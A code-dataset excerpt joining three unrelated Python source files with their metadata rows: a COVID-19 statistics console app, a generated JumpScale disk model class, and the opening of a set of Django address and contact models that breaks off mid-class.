Run program.
"""
doctest.testmod()
# Welcome message
print("Welcome to the COVID-19 App! Before we get started, lets generate your user profile.")
# Create user
user = user_generation.create_user()
# Check if user information is correct
user_generation.check_if_user_information_is_correct(user)
while True:
user_choice = option_menu()
try:
menu_handler(user_choice, user)
except TypeError:
print("Your input was invalid or not an option, try again")
if __name__ == '__main__':
main()
|
"""
Main application file
"""
import market_data
import covid19_stats
import news
import user_generation
import funding
import dow_plot
import doctest
def option_menu() -> int:
"""
Ask user to choose option.
:precondition: input must be a number that corresponds with an option
:postcondition: will return the user's choice as an int
:return: input as an int
"""
while True:
print("Please select an option from the following menu.")
try:
return int(input("""
1. Global Statistics
2. Information about my Country
3. Search by Country
4. News Articles
5. Search Stocks
6. Am I Eligible for the Canadian Emergency Response Benefit Funding?
7. Show effect of COVID-19 on DOW Jones Index
8. Quit
\n""").strip())
except ValueError:
print("Please input a number that corresponds to an option on the menu.")
def menu_handler(user_input: int, user: object or str) -> object:
"""
Return function that corresponds you user_input.
:param user_input: a user entered integer
:param user: a well formed user object
:precondition: user_input must be an integer that corresponds with an option
:precondition: user must be an object created in user_generation
:postcondition: will return the function that corresponds with desired option
:raise: TypeError if user_input does not correspond with and option
:return: a function that corresponds with user_input
"""
# Return the corresponding function
if user_input == 1:
return global_statistics()
if user_input == 2:
return my_country(user)
if user_input == 3:
return country_search()
if user_input == 4:
return get_news()
if user_input == 5:
search_stocks()
if user_input == 6:
return verify_canadian_funding(user)
if user_input == 7:
show_dow_chart()
if user_input == 8:
print("Have a nice day, and remember to wash your hands!")
quit()
else:
raise TypeError
def search_stocks():
"""
Ask user for stock
:postcondition: will run ask_for_stock() and ask user for a stock and then display the information
"""
market_data.ask_for_stock()
def show_dow_chart():
"""
Display DOW JONES chart.
:postcondition: will run the main function in dow_plot file
"""
dow_plot.main()
def verify_canadian_funding(user: object):
"""
Verify if user is eligible for Canadian Emergency Response Benefit funding.
:param user: User object
:precondition: user_object must be a well-formed User object
:postcondition: Successfully verify if user is eligible for Canadian Emergency Response Benefit funding
"""
funding.verify_for_funding(user)
def my_country(user: object or str):
"""
Display statistics from user country.
:param user: a well formed user object
:precondition: user must be an object created in user_generation
:postcondition: will display all information regarding the user's inputted location
"""
# Display country
print(user.get_country())
# Get Country stats by passing it to get_country_stats
country_stats = covid19_stats.get_country_stats(user.get_country())
display_statistics(country_stats)
def get_news():
"""
Display news article interface
:postcondition: will run the news article function get_default_country_top_headlines() from news
"""
news.display_news_articles_menu()
def country_search():
"""
Search country specific statistics.
:precondition: country input must be a valid country
:postcondition: will display the information regarding the entered country
:except: StopIteration if input is not a valid country
"""
# Ask user for input
country = input("Please input country\n").strip()
# Check if input meets conditions
try:
country_statistics = covid19_stats.get_country_stats(country)
except StopIteration:
print("Sorry, Your input is not a valid country\n")
print("Try typing the full name of the country. Ex: United States -> United States of America")
else:
# Display information
print(country.capitalize())
display_statistics(country_statistics)
def global_statistics():
"""
Display the global COVID-19 statistics.
:postcondition: will display all statistics for the world
"""
# Get the dictionary from from the api
global_dict = covid19_stats.global_stats()
# Specify the key
statistics = global_dict['Global']
# Display the information
display_statistics(statistics)
def display_statistics(statistics: dict or str):
"""
Display statistics from given dictionary.
:param statistics: covid19 dictionary
:preconditions: statistics must be a well formatted covid19 API dictionary
:postconditions: Will display details statistics regarding the specified dictionary
"""
print(f"""
Total Active Cases: {statistics["TotalConfirmed"] - statistics["TotalDeaths"] - statistics["TotalRecovered"]}
New Confirmed Cases: {statistics["NewConfirmed"]}
Total Confirmed: {statistics["TotalConfirmed"]}
New Deaths: {statistics["NewDeaths"]}
Total Deaths: {statistics["TotalDeaths"]}
Newly Recovered: {statistics["NewRecovered"]}
Total Recovered: {statistics["TotalRecovered"]}
\n""")
input("Hit enter to continue")
def main():
"""
Run program.
"""
doctest.testmod()
# Welcome message
print("Welcome to the COVID-19 App! Before we get started, lets generate your user profile.")
# Create user
user = user_generation.create_user()
# Check if user information is correct
user_generation.check_if_user_information_is_correct(user)
while True:
user_choice = option_menu()
try:
menu_handler(user_choice, user)
except TypeError:
print("Your input was invalid or not an option, try again")
if __name__ == '__main__':
main()
|
en
| 0.715568
|
Main application file Ask user to choose option. :precondition: input must be a number that corresponds with an option :postcondition: will return the user's choice as an int :return: input as an int 1. Global Statistics 2. Information about my Country 3. Search by Country 4. News Articles 5. Search Stocks 6. Am I Eligible for the Canadian Emergency Response Benefit Funding? 7. Show effect of COVID-19 on DOW Jones Index 8. Quit \n Return function that corresponds you user_input. :param user_input: a user entered integer :param user: a well formed user object :precondition: user_input must be an integer that corresponds with an option :precondition: user must be an object created in user_generation :postcondition: will return the function that corresponds with desired option :raise: TypeError if user_input does not correspond with and option :return: a function that corresponds with user_input # Return the corresponding function Ask user for stock :postcondition: will run ask_for_stock() and ask user for a stock and then display the information Display DOW JONES chart. :postcondition: will run the main function in dow_plot file Verify if user is eligible for Canadian Emergency Response Benefit funding. :param user: User object :precondition: user_object must be a well-formed User object :postcondition: Successfully verify if user is eligible for Canadian Emergency Response Benefit funding Display statistics from user country. :param user: a well formed user object :precondition: user must be an object created in user_generation :postcondition: will display all information regarding the user's inputted location # Display country # Get Country stats by passing it to get_country_stats Display news article interface :postcondition: will run the news article function get_default_country_top_headlines() from news Search country specific statistics. :precondition: country input must be a valid country :postcondition: will display the information regarding the entered country :except: StopIteration if input is not a valid country # Ask user for input # Check if input meets conditions # Display information Display the global COVID-19 statistics. :postcondition: will display all statistics for the world # Get the dictionary from from the api # Specify the key # Display the information Display statistics from given dictionary. :param statistics: covid19 dictionary :preconditions: statistics must be a well formatted covid19 API dictionary :postconditions: Will display details statistics regarding the specified dictionary Total Active Cases: {statistics["TotalConfirmed"] - statistics["TotalDeaths"] - statistics["TotalRecovered"]} New Confirmed Cases: {statistics["NewConfirmed"]} Total Confirmed: {statistics["TotalConfirmed"]} New Deaths: {statistics["NewDeaths"]} Total Deaths: {statistics["TotalDeaths"]} Newly Recovered: {statistics["NewRecovered"]} Total Recovered: {statistics["TotalRecovered"]} \n Run program. # Welcome message # Create user # Check if user information is correct
| 3.844191
| 4
|
apps/osis/logic/system/disk/system_disk_osismodelbase.py
|
rudecs/jumpscale_core7
| 0
|
6627638
|
<reponame>rudecs/jumpscale_core7
from JumpScale import j
class system_disk_osismodelbase(j.code.classGetJSRootModelBase()):
def __init__(self):
pass
self._P_id=0
self._P_partnr=0
self._P_gid=0
self._P_nid=0
self._P_path=""
self._P_size=0
self._P_free=0
self._P_ssd=0
self._P_fs=""
self._P_mounted=True
self._P_mountpoint=""
self._P_active=True
self._P_model=""
self._P_description=""
self._P_type=list()
self._P_lastcheck=""
self._P_guid=""
self._P__meta=list()
self._P__meta=["osismodel","system","disk",1] #@todo version not implemented now, just already foreseen
@property
def id(self):
return self._P_id
@id.setter
def id(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property id input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_id=value
@id.deleter
def id(self):
del self._P_id
@property
def partnr(self):
return self._P_partnr
@partnr.setter
def partnr(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property partnr input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_partnr=value
@partnr.deleter
def partnr(self):
del self._P_partnr
@property
def gid(self):
return self._P_gid
@gid.setter
def gid(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property gid input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_gid=value
@gid.deleter
def gid(self):
del self._P_gid
@property
def nid(self):
return self._P_nid
@nid.setter
def nid(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property nid input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_nid=value
@nid.deleter
def nid(self):
del self._P_nid
@property
def path(self):
return self._P_path
@path.setter
def path(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property path input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_path=value
@path.deleter
def path(self):
del self._P_path
@property
def size(self):
return self._P_size
@size.setter
def size(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property size input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_size=value
@size.deleter
def size(self):
del self._P_size
@property
def free(self):
return self._P_free
@free.setter
def free(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property free input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_free=value
@free.deleter
def free(self):
del self._P_free
@property
def ssd(self):
return self._P_ssd
@ssd.setter
def ssd(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property ssd input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_ssd=value
@ssd.deleter
def ssd(self):
del self._P_ssd
@property
def fs(self):
return self._P_fs
@fs.setter
def fs(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property fs input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_fs=value
@fs.deleter
def fs(self):
del self._P_fs
@property
def mounted(self):
return self._P_mounted
@mounted.setter
def mounted(self, value):
if not isinstance(value, bool) and value is not None:
if isinstance(value, basestring) and j.basetype.boolean.checkString(value):
value = j.basetype.boolean.fromString(value)
else:
msg="property mounted input error, needs to be bool, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_mounted=value
@mounted.deleter
def mounted(self):
del self._P_mounted
@property
def mountpoint(self):
return self._P_mountpoint
@mountpoint.setter
def mountpoint(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property mountpoint input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_mountpoint=value
@mountpoint.deleter
def mountpoint(self):
del self._P_mountpoint
@property
def active(self):
return self._P_active
@active.setter
def active(self, value):
if not isinstance(value, bool) and value is not None:
if isinstance(value, basestring) and j.basetype.boolean.checkString(value):
value = j.basetype.boolean.fromString(value)
else:
msg="property active input error, needs to be bool, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_active=value
@active.deleter
def active(self):
del self._P_active
@property
def model(self):
return self._P_model
@model.setter
def model(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property model input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_model=value
@model.deleter
def model(self):
del self._P_model
@property
def description(self):
return self._P_description
@description.setter
def description(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property description input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_description=value
@description.deleter
def description(self):
del self._P_description
@property
def type(self):
return self._P_type
@type.setter
def type(self, value):
if not isinstance(value, list) and value is not None:
if isinstance(value, basestring) and j.basetype.list.checkString(value):
value = j.basetype.list.fromString(value)
else:
msg="property type input error, needs to be list, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_type=value
@type.deleter
def type(self):
del self._P_type
@property
def lastcheck(self):
return self._P_lastcheck
@lastcheck.setter
def lastcheck(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property lastcheck input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_lastcheck=value
@lastcheck.deleter
def lastcheck(self):
del self._P_lastcheck
@property
def guid(self):
return self._P_guid
@guid.setter
def guid(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property guid input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_guid=value
@guid.deleter
def guid(self):
del self._P_guid
@property
def _meta(self):
return self._P__meta
@_meta.setter
def _meta(self, value):
if not isinstance(value, list) and value is not None:
if isinstance(value, basestring) and j.basetype.list.checkString(value):
value = j.basetype.list.fromString(value)
else:
msg="property _meta input error, needs to be list, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P__meta=value
@_meta.deleter
def _meta(self):
del self._P__meta
|
from JumpScale import j
class system_disk_osismodelbase(j.code.classGetJSRootModelBase()):
def __init__(self):
pass
self._P_id=0
self._P_partnr=0
self._P_gid=0
self._P_nid=0
self._P_path=""
self._P_size=0
self._P_free=0
self._P_ssd=0
self._P_fs=""
self._P_mounted=True
self._P_mountpoint=""
self._P_active=True
self._P_model=""
self._P_description=""
self._P_type=list()
self._P_lastcheck=""
self._P_guid=""
self._P__meta=list()
self._P__meta=["osismodel","system","disk",1] #@todo version not implemented now, just already foreseen
@property
def id(self):
return self._P_id
@id.setter
def id(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property id input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_id=value
@id.deleter
def id(self):
del self._P_id
@property
def partnr(self):
return self._P_partnr
@partnr.setter
def partnr(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property partnr input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_partnr=value
@partnr.deleter
def partnr(self):
del self._P_partnr
@property
def gid(self):
return self._P_gid
@gid.setter
def gid(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property gid input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_gid=value
@gid.deleter
def gid(self):
del self._P_gid
@property
def nid(self):
return self._P_nid
@nid.setter
def nid(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property nid input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_nid=value
@nid.deleter
def nid(self):
del self._P_nid
@property
def path(self):
return self._P_path
@path.setter
def path(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property path input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_path=value
@path.deleter
def path(self):
del self._P_path
@property
def size(self):
return self._P_size
@size.setter
def size(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property size input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_size=value
@size.deleter
def size(self):
del self._P_size
@property
def free(self):
return self._P_free
@free.setter
def free(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property free input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_free=value
@free.deleter
def free(self):
del self._P_free
@property
def ssd(self):
return self._P_ssd
@ssd.setter
def ssd(self, value):
if not isinstance(value, int) and value is not None:
if isinstance(value, basestring) and j.basetype.integer.checkString(value):
value = j.basetype.integer.fromString(value)
else:
msg="property ssd input error, needs to be int, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_ssd=value
@ssd.deleter
def ssd(self):
del self._P_ssd
@property
def fs(self):
return self._P_fs
@fs.setter
def fs(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property fs input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_fs=value
@fs.deleter
def fs(self):
del self._P_fs
@property
def mounted(self):
return self._P_mounted
@mounted.setter
def mounted(self, value):
if not isinstance(value, bool) and value is not None:
if isinstance(value, basestring) and j.basetype.boolean.checkString(value):
value = j.basetype.boolean.fromString(value)
else:
msg="property mounted input error, needs to be bool, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_mounted=value
@mounted.deleter
def mounted(self):
del self._P_mounted
@property
def mountpoint(self):
return self._P_mountpoint
@mountpoint.setter
def mountpoint(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property mountpoint input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_mountpoint=value
@mountpoint.deleter
def mountpoint(self):
del self._P_mountpoint
@property
def active(self):
return self._P_active
@active.setter
def active(self, value):
if not isinstance(value, bool) and value is not None:
if isinstance(value, basestring) and j.basetype.boolean.checkString(value):
value = j.basetype.boolean.fromString(value)
else:
msg="property active input error, needs to be bool, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_active=value
@active.deleter
def active(self):
del self._P_active
@property
def model(self):
return self._P_model
@model.setter
def model(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property model input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_model=value
@model.deleter
def model(self):
del self._P_model
@property
def description(self):
return self._P_description
@description.setter
def description(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property description input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_description=value
@description.deleter
def description(self):
del self._P_description
@property
def type(self):
return self._P_type
@type.setter
def type(self, value):
if not isinstance(value, list) and value is not None:
if isinstance(value, basestring) and j.basetype.list.checkString(value):
value = j.basetype.list.fromString(value)
else:
msg="property type input error, needs to be list, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_type=value
@type.deleter
def type(self):
del self._P_type
@property
def lastcheck(self):
return self._P_lastcheck
@lastcheck.setter
def lastcheck(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property lastcheck input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_lastcheck=value
@lastcheck.deleter
def lastcheck(self):
del self._P_lastcheck
@property
def guid(self):
return self._P_guid
@guid.setter
def guid(self, value):
if not isinstance(value, str) and value is not None:
if isinstance(value, basestring) and j.basetype.string.checkString(value):
value = j.basetype.string.fromString(value)
else:
msg="property guid input error, needs to be str, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P_guid=value
@guid.deleter
def guid(self):
del self._P_guid
@property
def _meta(self):
return self._P__meta
@_meta.setter
def _meta(self, value):
if not isinstance(value, list) and value is not None:
if isinstance(value, basestring) and j.basetype.list.checkString(value):
value = j.basetype.list.fromString(value)
else:
msg="property _meta input error, needs to be list, specfile: /opt/jumpscale7/apps/osis/logic/system/model.spec, name model: disk, value was:" + str(value)
raise TypeError(msg)
self._P__meta=value
@_meta.deleter
def _meta(self):
del self._P__meta
|
en
| 0.745183
|
#@todo version not implemented now, just already foreseen
| 2.052455
| 2
|
serpantin/apps/common/models.py
|
ainomugish/serpantin
| 0
|
6627639
|
<reponame>ainomugish/serpantin
#
#
#
from string import find
from django.db import models
#from django.core import validators
#from django.core.validators import isValidEmail
from django.utils.translation import gettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib import admin
from django.contrib.auth.models import User
from serpantin.dojoforms import *
class Country(models.Model):
#addr_code = models.CharField(_('Street Code'), max_length=6)
name = models.CharField(_('Country Name'), max_length=100)
createuser = models.ForeignKey(User, related_name='created_countries', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_countries', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Country')
verbose_name_plural = _('Countries')
ordering = ('name',)
class Admin:
fields = (
(None, {'fields': ('name',)}),
)
list_display = ('name',)
def __unicode__(self):
return self.name
class Region(models.Model):
country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
#FIXME: shortname is too short
#shortname = models.CharField(_('Region Code'), max_length=6, unique=True, blank=True)
name = models.CharField(_('Region Name'), max_length=100, unique=True)
createuser = models.ForeignKey(User, related_name='created_regions', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_regionss', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Region')
verbose_name_plural = _('Regions')
class Admin:
fields = (
(None, {'fields': ('name',)}),
)
list_display = ('name',)
def __unicode__(self):
return self.name
class District(models.Model):
name = models.CharField(_('District Name'), max_length=60, blank=True)
region = models.ForeignKey(Region, verbose_name=_('Region Name'), blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_districts', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_districts', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('District')
verbose_name_plural = _('Districts')
unique_together = (('name', 'region'), )
class Admin:
list_display = ('name',)
search_fields = ['name',]
def __unicode__(self):
return u"%s" % (self.name,)
class TownType(models.Model):
shortname = models.CharField(max_length=5, blank=True, null=True)
name = models.CharField(max_length=60, blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_towntypes', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_towntypes', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('TownType')
verbose_name_plural = _('TownTypes')
class Admin:
pass
def __unicode__(self):
return u"%s" % self.shortname
class Town(models.Model):
#code = models.CharField(_('Town Code'), max_length=6)
country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
region = models.ForeignKey(Region, blank=True, null=True, verbose_name=_('Region'))
district = models.ForeignKey(District, blank=True, null=True, verbose_name=_('District'))
type = models.ForeignKey(TownType, verbose_name=_('Type'), blank=True, null=True)
name = models.CharField(_('Town Name'), max_length=35)
is_region_centre = models.BooleanField(_('IRC?')) #Is Region Centre?
is_district_centre = models.BooleanField(_('IDC?')) #Is District Centre?
createuser = models.ForeignKey(User, related_name='created_towns', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_towns', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name = _('Town')
verbose_name_plural = _('Towns')
ordering = ('name',)
class Admin:
list_display = ('type','name','region','district','is_region_centre','is_district_centre')
#js = ('js/tiny_mce/tiny_mce.js','js/tiny_mce/textareas.js'),
list_filter = ['createdate']
search_fields = ['name',]
class StreetType(models.Model):
shortname = models.CharField(max_length=5, blank=True, null=True)
name = models.CharField(max_length=60, blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_streettypes', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_streettypes', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('StreetType')
verbose_name_plural = _('StreetTypes')
class Admin:
pass
def __unicode__(self):
return u"%s" % self.shortname
class Street(models.Model):
#addr_code = models.CharField(_('Street Code'), max_length=6)
name = models.CharField(_('Street Name'), max_length=100)
#type = models.ForeignKey(StreetType, null=True)
createuser = models.ForeignKey(User, related_name='created_streets', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_streets', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Street')
verbose_name_plural = _('Streets')
ordering = ('name',)
class Admin:
list_display = ('name',)
def __unicode__(self):
return u"%s" % self.name
PHONE_CHOICES = (
('P', _('City Number')),
('F', _('Fax Number')),
('M', _('Mobile Number')),
)
class Phone(models.Model):
type = models.CharField(_('Phone Type'), max_length=1, choices=PHONE_CHOICES)
number = models.CharField(_('Phone Number'), unique=True, max_length=30)
createuser = models.ForeignKey(User, related_name='created_phones', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_phones', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Phone')
verbose_name_plural = _('Phones')
class Admin:
list_display = ('type','number','createuser')
search_fields = ['number',]
def __unicode__(self):
return u"%s %s" % (self.type, self.number)
class PhoneList(models.Model):
number = models.ForeignKey(Phone, verbose_name=_('Phone Number'))
content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
object_id = models.IntegerField()
createuser = models.ForeignKey(User, related_name='created_phonelist', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_phonelist', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
content_object = generic.GenericForeignKey()
class Meta:
verbose_name = _('Phone List')
verbose_name_plural = _('Phone Lists')
class Admin:
list_display = ('number','content_type','object_id','createuser')
def __unicode__(self):
return u"%s" % (self.number)
class Addresstype(models.Model):
shortname = models.CharField(_('Addresstype Short Name'), max_length=20, unique=True)
name = models.CharField(_('Addresstype Name'), max_length=40)
createuser = models.ForeignKey(User, related_name='created_addresstype', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_addresstype', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Address Type')
verbose_name_plural = _('Address Types')
class Admin:
list_display = ('shortname','name','createuser')
def __unicode__(self):
return u"%s" % (self.shortname)
class Location(models.Model):
zipcode = models.CharField(_('Zipcode'), max_length=10, blank=True)
town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
town_aux = models.ForeignKey(Town, related_name='town_aux', blank=True, null=True, verbose_name=_('Town (Aux.)'))
street = models.ForeignKey(Street, blank=True, null=True, verbose_name=_('Street'))
building = models.CharField(_('Building'), max_length=35, blank=True)
extention = models.TextField(_('Extention'), blank=True)
createuser = models.ForeignKey(User, related_name='created_locations', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_locations', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Location')
verbose_name_plural = _('Locations')
class Admin:
